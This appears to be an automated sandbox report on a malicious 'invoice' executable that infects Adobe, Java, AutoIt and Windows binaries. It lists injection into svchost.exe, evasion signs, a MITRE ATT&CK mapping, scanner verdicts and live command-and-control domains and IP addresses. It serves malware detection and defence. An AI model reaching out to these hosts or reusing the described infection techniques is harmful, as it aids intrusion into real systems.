      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\jabswitch.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\rmid.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Windows Media Player\wmpnetwk.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\java-rmi.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\dwtrig20.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\javacpl.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\kinit.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\javaw.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Windows\System32\VSSVC.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\tnameserv.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\ktab.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\jp2launcher.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Windows\System32\SearchIndexer.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\policytool.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\keytool.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\javaws.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\orbd.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\java.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Windows\System32\dllhost.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\jjs.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\servertool.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\unpack200.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Dropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\DW20.EXEJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\ose.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Windows\System32\sppsvc.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\CCleaner\CCleaner.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\klist.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\pack200.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeDropped PE file which has not been started: C:\Program Files\Java\jre1.8.0_121\bin\rmiregistry.exeJump to dropped file
      Source: C:\Windows\SysWOW64\svchost.exe TID: 3384Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\alg.exe TID: 3488Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\ehome\ehrecvr.exe TID: 3828Thread sleep time: -120000s >= -30000sJump to behavior
      Source: C:\Windows\ehome\ehsched.exe TID: 3904Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\System32\ieetwcollector.exe TID: 4052Thread sleep time: -60000s >= -30000sJump to behavior
      Source: C:\Windows\System32\msdtc.exe TID: 3056Thread sleep count: 401 > 30Jump to behavior
      Source: C:\Windows\System32\msdtc.exe TID: 3056Thread sleep time: -40100s >= -30000sJump to behavior
      Source: C:\Windows\System32\msiexec.exe TID: 2028Thread sleep time: -60000s >= -30000s
      Source: C:\Windows\SysWOW64\perfhost.exe TID: 2208Thread sleep count: 3816 > 30
      Source: C:\Windows\SysWOW64\perfhost.exe TID: 2208Thread sleep time: -38160000s >= -30000s
      Source: C:\Windows\SysWOW64\perfhost.exe TID: 2208Thread sleep count: 6182 > 30
      Source: C:\Windows\SysWOW64\perfhost.exe TID: 2208Thread sleep time: -61820000s >= -30000s
      Source: C:\Windows\System32\vds.exe TID: 2632Thread sleep time: -60000s >= -30000s
      Source: C:\Windows\System32\wbengine.exe TID: 2216Thread sleep time: -60000s >= -30000s
      Source: C:\Windows\SysWOW64\perfhost.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\perfhost.exeLast function: Thread delayed
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Jump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\Jump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Jump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Esl\Jump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Jump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile opened: C:\Program Files (x86)\adobe\Acrobat Reader DC\Reader\Jump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
      Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\invoice_96.73.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Users\user\Desktop\invoice_96.73.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008
Source: C:\Users\user\Desktop\invoice_96.73.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\invoice_96.73.exe"
Source: invoice_96.73.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: C:\Users\user\Desktop\invoice_96.73.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\ehome\ehrecvr.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\ehome\ehsched.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\perfhost.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\alg.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: invoice_96.73.exe, 00000000.00000002.356954240.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.347417971.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.348829898.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.346600617.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.346132197.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp, invoice_96.73.exe, 00000000.00000003.346170507.0000000000C4D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: msmpeng.exe

Stealing of Sensitive Information

Source: Yara match | File source: 00000004.00000002.387515587.0000000000240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.387578097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match | File source: 00000004.00000002.387515587.0000000000240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.387578097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
MITRE ATT&CK matrix, listed per tactic (the number in parentheses is the count printed next to the technique in the report; techniques without a number had no count):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Scheduled Task/Job (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: Windows Service (1); Scheduled Task/Job (1); LSASS Driver (1); DLL Side-Loading (1); Network Logon Script; RC Scripts
Privilege Escalation: Windows Service (1); Process Injection (212); Scheduled Task/Job (1); LSASS Driver (1); DLL Side-Loading (1); RC Scripts
Defense Evasion: Masquerading (222); Virtualization/Sandbox Evasion (2); Process Injection (212); Obfuscated Files or Information (1); Software Packing (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (22); Virtualization/Sandbox Evasion (2); Process Discovery (2); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (112)
Lateral Movement: Taint Shared Content (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Ingress Tool Transfer (2); Non-Application Layer Protocol (3); Application Layer Protocol (13); Protocol Impersonation; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph ID: 1564502 | Sample: invoice_96.73.exe | Start date: 28/11/2024 | Architecture: WINDOWS | Score: 100

Start node
  DNS/IP: yunalwv.biz; ytctnunms.biz; 15 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; 8 other signatures
  Processes started: armsvc.exe 1; invoice_96.73.exe 3; wbengine.exe; 13 other processes

armsvc.exe
  DNS/IP: yunalwv.biz 208.100.26.245 (ports 49184, 80) STEADFASTUS, United States; lpuegx.biz 82.112.184.197 (ports 49172, 49173, 49174) FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU, Russian Federation; 20 other IPs or domains
  Dropped: C:\Windows\ehome\ehsched.exe (PE32+); C:\Windows\ehome\ehrecvr.exe (PE32+); C:\Windows\System32\wbengine.exe (PE32+); 73 other malicious files
  Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Drops executable to a common third party application directory; Infects executable files (exe, dll, sys, html)

invoice_96.73.exe
  DNS/IP: acwjcqqv.biz 18.141.10.107 (ports 49165, 49166, 49171) AMAZON-02US, United States; ssbzmoy.biz; pywolwnvd.biz
  Dropped: C:\Windows\System32\alg.exe (PE32+); C:\Windows\...\FlashPlayerUpdateService.exe (PE32); C:\Windows\Microsoft.NET\...\aspnet_state.exe (PE32+); C:\Program Files (x86)\...\armsvc.exe (PE32)
  Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
  Process started: svchost.exe

wbengine.exe
  Signatures: Creates files inside the volume driver (system volume information)

Source | Detection | Scanner | Label
invoice_96.73.exe | 96% | ReversingLabs | Win32.Virus.Expiro
invoice_96.73.exe | 100% | Avira | W32/Infector.Gen
invoice_96.73.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe | 100% | Avira | W32/Infector.Gen
C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\DW20.EXE | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | 100% | Avira | W32/Infector.Gen
C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\dwtrig20.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | 100% | Avira | W32/Infector.Gen
C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\setup.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | 100% | Avira | W32/Infector.Gen
C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\ose.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exe | 100% | Avira | W32/Infector.Gen
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe | 100% | Joe Sandbox ML |
C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\DW20.EXE | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Au3Check.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Au3Info.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe | 100% | Joe Sandbox ML |
C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\dwtrig20.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | 100% | Joe Sandbox ML |
C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\setup.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe | 100% | Joe Sandbox ML |
C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\ose.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe | 100% | Joe Sandbox ML |
C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exe | 100% | Joe Sandbox ML |
      No Antivirus matches
      No Antivirus matches
Source | Detection | Scanner | Label
http://18.141.10.107/bpewylwxymwihal: | 0% | Avira URL Cloud | safe
http://18.141.10.107/bpewylwxymwihal | 0% | Avira URL Cloud | safe
http://13.251.16.150/nqtlxhjrub | 0% | Avira URL Cloud | safe
                                                                                                                              http://ifsaia.biz/rkqafalse
                                                                                                                                high
                                                                                                                                http://lrxdmhrr.biz/tgcwttfqletfhyqfalse
                                                                                                                                  high
                                                                                                                                  http://przvgke.biz/nabdwfalse
                                                                                                                                    high
                                                                                                                                    http://tbjrpv.biz/ebyryipvfalse
                                                                                                                                      high
                                                                                                                                      http://vjaxhpbji.biz/webejpnbfwojkbvfalse
                                                                                                                                        high
                                                                                                                                        http://knjghuig.biz/ydlpotfktdldcfalse
                                                                                                                                          high
                                                                                                                                          http://deoci.biz/vhlxvykfalse
                                                                                                                                            high
                                                                                                                                            http://gnqgo.biz/tgcwttfqletfhyqfalse
                                                                                                                                              high
                                                                                                                                              http://fwiwk.biz/hwxehcdfalse
                                                                                                                                                high
                                                                                                                                                http://qaynky.biz/nqtlxhjrubfalse
                                                                                                                                                  high
                                                                                                                                                  http://ssbzmoy.biz/bpewylwxymwihalfalse
                                                                                                                                                    high
Name | Source | Malicious | Antivirus Detection | Reputation
http://18.141.10.107/bpewylwxymwihal: | invoice_96.73.exe, 00000000.00000002.356954240.0000000000B54000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://13.251.16.150/nqtlxhjrub | armsvc.exe, 00000002.00000002.620027406.000000000063C000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000002.620027406.0000000000655000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | armsvc.exe, 00000002.00000003.418303558.00000000020C0000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://18.141.10.107/bpewylwxymwihal | invoice_96.73.exe, 00000000.00000002.356954240.0000000000B54000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/soap/envelope/ | armsvc.exe, 00000002.00000003.418303558.00000000020C0000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://www.autoitscript.com/autoit3/ | Aut2exe_x64.exe.2.dr | false | | high
http://www.winimage.com/zLibDll | RdrServicesUpdater.exe.2.dr | false | | high
http://www.autoitscript.com/autoit3/8 | armsvc.exe, 00000002.00000003.586384130.0000000001570000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.580781457.0000000001570000.00000004.00001000.00020000.00000000.sdmp, Aut2exe_x64.exe.2.dr | false | | high
https://www.autoitscript.com/site/autoit/8 | armsvc.exe, 00000002.00000003.597459044.0000000001570000.00000004.00001000.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
44.221.84.105 | jhvzpcfg.biz | United States | 14618 | AMAZON-AESUS | false
